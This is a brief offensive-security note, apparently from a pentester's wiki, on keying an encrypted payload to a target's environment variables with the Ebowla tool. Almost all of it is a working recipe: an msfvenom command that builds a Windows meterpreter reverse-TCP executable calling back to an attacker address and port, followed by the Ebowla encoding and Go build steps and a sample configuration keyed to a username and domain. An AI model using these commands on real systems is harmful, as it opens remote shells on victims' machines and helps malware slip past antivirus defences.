Last updated 2 years ago
We encode a payload that gets dynamically decoded in the run time on the box. For example we use environment variables for encoding like username, computer name etc.
msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.133 LPORT=9001 -f exe > shell.exe ./ebowla.py shell.exe genetic.config ./build_x64_go.sh output/go_symmetric_shell.exe.go morph3-ebowla.exe
An example genetic.config,
... output_type = GO ... [[ENV_VAR]] username = 'morph3' computername = '' homepath = '' homedrive = '' Number_of_processors = '' processor_identifier = '' processor_revision = '' userdomain = 'acme' systemdrive = '' userprofile = '' path = '' temp = ''